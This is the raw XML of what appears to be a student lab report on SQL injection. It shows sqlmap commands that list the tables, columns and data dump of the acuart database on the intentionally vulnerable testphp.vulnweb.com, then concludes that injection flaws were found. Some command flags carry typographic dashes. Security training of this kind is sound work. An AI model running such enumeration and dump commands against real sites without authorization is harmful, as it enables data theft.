          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1970090E" w14:textId="7A18184D" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09694759" w14:textId="26E2E119" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E245A9" w14:textId="65396D67" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="0061204B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>Listing tables present in Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726E34E" w14:textId="1C39A9D2" w:rsidR="004251DE" w:rsidRPr="00BF31B1" w:rsidRDefault="00275877">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1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7E1ECE5" wp14:editId="7F1558E2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>802257</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3856894</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3756660"/>
            <wp:effectExtent l="0" t="0" r="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1B1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49A41F" wp14:editId="69B60992">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-103517</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>283653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3511550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483" w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77156B3A" w14:textId="77777777" w:rsidR="00970311" w:rsidRPr="00BF31B1" w:rsidRDefault="00970311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57598EAE" w14:textId="6E1E51EC" w:rsidR="00EA1F71" w:rsidRPr="00BF31B1" w:rsidRDefault="00EA1F71" w:rsidP="00EA1F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>List column information of a particular table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A893C43" w14:textId="3198EA76" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00EA1F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products –columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D405068" w14:textId="77777777" w:rsidR="00EA1F71" w:rsidRPr="00BF31B1" w:rsidRDefault="00EA1F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F51EA1" w14:textId="4BA61CA9" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="0054792F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA65BA2" wp14:editId="35BA7D05">
            <wp:extent cx="5943600" cy="3672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68AA" w14:textId="6E2E411E" w:rsidR="00B77C4A" w:rsidRPr="00BF31B1" w:rsidRDefault="00B77C4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F850EC3" w14:textId="7C5B6F55" w:rsidR="005A29A6" w:rsidRPr="00BF31B1" w:rsidRDefault="005A29A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACAFDCC" w14:textId="478DEC6D" w:rsidR="0054792F" w:rsidRPr="00BF31B1" w:rsidRDefault="0054792F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D881F82" w14:textId="77777777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53C203BE" w14:textId="77777777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579D5851" w14:textId="77777777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49B8CFA5" w14:textId="77777777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4FAD7709" w14:textId="77777777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735A7F88" w14:textId="65AE2E3A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6630470D" w14:textId="6522B1B6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7F0873D9" w14:textId="025138C8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00FC0855" w14:textId="5FD856C8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09862672" w14:textId="7A7DAA71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4200B8BF" w14:textId="77777777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0BD7794E" w14:textId="77777777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38683ECE" w14:textId="77777777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789B48A8" w14:textId="77777777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5F19F3EB" w14:textId="77777777" w:rsidR="00275877" w:rsidRPr="00BF31B1" w:rsidRDefault="00275877">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB3ED03" w14:textId="20650913" w:rsidR="0054792F" w:rsidRPr="00BF31B1" w:rsidRDefault="0054792F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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>Dump the data from the columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640C785" w14:textId="5E781332" w:rsidR="0054792F" w:rsidRPr="00BF31B1" w:rsidRDefault="0054792F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products -Cname – dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583854B2" w14:textId="64AF5D13" w:rsidR="0054792F" w:rsidRPr="00BF31B1" w:rsidRDefault="0054792F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="674A847E" wp14:editId="05FD5390">
            <wp:extent cx="5943600" cy="3442335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7C0B" w14:textId="2CAD792E" w:rsidR="005444F6" w:rsidRPr="00BF31B1" w:rsidRDefault="005444F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160EA29E" w14:textId="4A81571F" w:rsidR="005444F6" w:rsidRPr="00BF31B1" w:rsidRDefault="005444F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF8244A" w14:textId="5FEF87D0" w:rsidR="005444F6" w:rsidRPr="00BF31B1" w:rsidRDefault="005444F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A2682" w14:textId="1D9BE78E" w:rsidR="005444F6" w:rsidRPr="00BF31B1" w:rsidRDefault="000811DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF31B1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>We were able to identify SQL injection vulnerabilities using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005444F6" w:rsidRPr="00BF3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A7"/>
    <w:rsid w:val="000811DE"/>
    <w:rsid w:val="00167D5E"/>
    <w:rsid w:val="001E2A3E"/>
    <w:rsid w:val="001F7606"/>
    <w:rsid w:val="00216A08"/>
    <w:rsid w:val="00275877"/>
    <w:rsid w:val="003F1ECA"/>
    <w:rsid w:val="004251DE"/>
    <w:rsid w:val="004B5CD9"/>
    <w:rsid w:val="00530A2A"/>
    <w:rsid w:val="005444F6"/>
    <w:rsid w:val="0054792F"/>
    <w:rsid w:val="005A28EF"/>
    <w:rsid w:val="005A29A6"/>
    <w:rsid w:val="0061204B"/>
    <w:rsid w:val="006A1CB1"/>
    <w:rsid w:val="007568F0"/>
    <w:rsid w:val="00766483"/>
    <w:rsid w:val="00782299"/>
    <w:rsid w:val="007D4E55"/>
    <w:rsid w:val="008200A7"/>
    <w:rsid w:val="00880003"/>
    <w:rsid w:val="00970311"/>
    <w:rsid w:val="009C0501"/>
    <w:rsid w:val="00AA7B27"/>
    <w:rsid w:val="00B77C4A"/>
    <w:rsid w:val="00BE70A2"/>
    <w:rsid w:val="00BF31B1"/>
    <w:rsid w:val="00CC65F1"/>
    <w:rsid w:val="00D416C0"/>
    <w:rsid w:val="00DD7E95"/>
    <w:rsid w:val="00EA1F71"/>
    <w:rsid w:val="00EB6D91"/>
    <w:rsid w:val="00F4234D"/>
    <w:rsid w:val="00F4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4CFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E8C2F4FB-E688-4559-8726-74A2319F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0003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880003"/>
    <w:pPr>
      <w:ind w:left="618" w:hanging="519"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia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80003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880003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880003"/>
    <w:pPr>
      <w:ind w:left="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia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88000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80003"/>
    <w:rPr>
      <w:rFonts w:eastAsia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80003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880003"/>
    <w:pPr>
      <w:ind w:left="618" w:hanging="519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Cordeiro</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hayden Cordeiro</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-02T04:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-02T13:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>